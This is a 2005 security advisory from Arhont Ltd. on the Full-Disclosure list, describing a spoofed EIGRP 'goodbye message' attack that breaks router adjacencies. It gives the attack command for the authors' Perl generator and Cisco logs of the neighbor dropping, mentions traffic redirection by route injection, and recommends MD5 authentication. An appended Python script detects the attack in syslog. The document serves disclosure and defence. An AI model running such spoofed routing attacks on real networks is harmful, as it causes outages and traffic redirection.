Arhont Ltd. - Information Security
Arhont Advisory by: Arhont Ltd

Advisory: Unauthenticated EIGRP DoS
Class: design bug
Version: EIGRP version 1.2
Model Specific: Other versions might have the same bug

DETAILS:

We have used our custom EIGRP packet generator, written in Perl, to evaluate the security of the EIGRP routing protocol. In the initial generator testing stage we successfully reproduced the known DoS against EIGRP discovered by FX and described at http://www.securityfocus.com/bid/6443. This attack is built into the generator under the --hellodos flag. The testing network was completely brought down by the resulting ARP storm.

Moving further, we discovered a novel selective, single-peer-directed DoS attack employing the EIGRP "Goodbye Message". A goodbye message is sent when an EIGRP routing process is shutting down, to tell the neighbors about the impending topology change and speed up convergence. This feature is supported in Cisco IOS Releases later than 12.3(2), 12.3(3)B, and 12.3(2)T.

A spoofed "goodbye message" can be sent to a peer, claiming that its neighbor is down, thus breaking the neighborhood:

arhontus #/eigrp.pl --ipgoodbye 192.168.66.202 --as 65534 --source 192.168.66.191

469573: Aug 16 2005 03:08:11.773 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.111 (Ethernet0/0) is up: new adjacency
c2611#sh ip eigrp neigh
IP-EIGRP neighbors for process 65534
H   Address                 Interface   Hold Uptime   SRTT   RTO  Q  Seq
                                        (sec)         (ms)       Cnt Num
2   192.168.66.111          Et0/0         13 00:01:08    1  5000  1  0
0   192.168.30.191          Se0/0         12 00:05:06    1  4500  0  198
1   192.168.66.191          Et0/0         13 00:05:14  201  1206  0  199
469574: Aug 16 2005 03:09:31.299 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.111 (Ethernet0/0) is down: retry limit exceeded
c2611#
469575: Aug 16 2005 03:09:32.818 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.111 (Ethernet0/0) is up: new adjacency
c2611#
469576: Aug 16 2005 03:09:56.277 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#
469577: Aug 16 2005 03:09:59.283 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
469578: Aug 16 2005 03:09:59.868 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is up: new adjacency
c2611#
469579: Aug 16 2005 03:10:02.288 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#
469580: Aug 16 2005 03:10:04.676 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is up: new adjacency
469581: Aug 16 2005 03:10:05.289 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#
469582: Aug 16 2005 03:10:08.290 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#sh ip eigrp neigh
IP-EIGRP neighbors for process 65534
H   Address                 Interface   Hold Uptime   SRTT   RTO  Q  Seq
                                        (sec)         (ms)       Cnt Num
0   192.168.30.191          Se0/0         14 00:09:50    1  4500  0  286

This selective neighborhood breaking can be used for purposes other than DoS. Re-initiating the EIGRP handshake helps a sniffing attacker to find information about the EIGRP routing domain topology. Possessing such information, a skilled attacker can selectively break the neighborhood to redirect traffic the way he wants. Of course, on an unprotected EIGRP domain there is a much simpler way of traffic redirection: either directly injecting routes using our packet generator, or establishing a fake neighborhood and supplying metric parameters to the legitimate peers that lead DUAL to favor the fake neighbor.

Risk Factor: Medium

Workarounds: Always use EIGRP MD5-based authentication.

Communication History: sent to PSIRT on 10/10/05

*According to the Arhont Ltd. policy, all of the found vulnerabilities and security issues will be reported to the manufacturer at least 7 days before releasing them to the public domains (such as CERT and BUGTRAQ). If you would like to get more information about this issue, please do not hesitate to contact Arhont team.*

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
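As an added example (not part of the advisory or of Arhont's generator), a small Python detector for the flap signature visible in the console capture above: a genuine goodbye arrives once, when a routing process shuts down, so several "Peer goodbye received" transitions for the same neighbor within a short window, interleaved with fresh adjacencies, are what a spoofed goodbye looks like in the router's syslog. The sample input is constructed from the advisory's own log lines; the window and threshold values are assumptions to tune per network.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed input: DUAL-5-NBRCHANGE lines from the advisory's console capture; a "c2611#" prompt left in front of a line is tolerated.
SAMPLE_LOG = """\
469574: Aug 16 2005 03:09:31.299 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.111 (Ethernet0/0) is down: retry limit exceeded
c2611# 469576: Aug 16 2005 03:09:56.277 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
469577: Aug 16 2005 03:09:59.283 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
469578: Aug 16 2005 03:09:59.868 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is up: new adjacency
469579: Aug 16 2005 03:10:02.288 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
469581: Aug 16 2005 03:10:05.289 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
469582: Aug 16 2005 03:10:08.290 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
"""

LINE_RE = re.compile(
    r"^(?:\S+#\s*)?\d+: (?P<ts>\w{3} +\d{1,2} \d{4} \d\d:\d\d:\d\d\.\d+) \w+: "
    r"%DUAL-5-NBRCHANGE: IP-EIGRP\(\d+\) (?P<asn>\d+): "
    r"Neighbor (?P<nbr>\S+) \((?P<iface>[^)]+)\) is (?P<state>up|down): (?P<reason>.+)$"
)

def parse_events(text):
    """One dict per DUAL-5-NBRCHANGE line; prompts and show output are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%b %d %Y %H:%M:%S.%f")
            events.append(ev)
    return events

def goodbye_flaps(text, window_s=60, min_goodbyes=3):
    """{(neighbor, interface): longest run} for peers torn down by 'Peer goodbye
    received' at least min_goodbyes times inside window_s seconds. Other down
    reasons (hold timer, retry limit exceeded) are deliberately not counted."""
    stamps_by_peer = defaultdict(list)
    for ev in parse_events(text):
        if ev["state"] == "down" and ev["reason"].startswith("Peer goodbye received"):
            stamps_by_peer[(ev["nbr"], ev["iface"])].append(ev["ts"])
    flagged = {}
    for peer, stamps in stamps_by_peer.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):  # sliding window over sorted timestamps
            while (ts - stamps[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= min_goodbyes:
                flagged[peer] = max(flagged.get(peer, 0), end - start + 1)
    return flagged
```

The alert is a stopgap for spotting the attack in syslog; the fix the advisory gives is MD5 authentication on every EIGRP interface, which makes an unauthenticated goodbye get dropped before DUAL ever sees it.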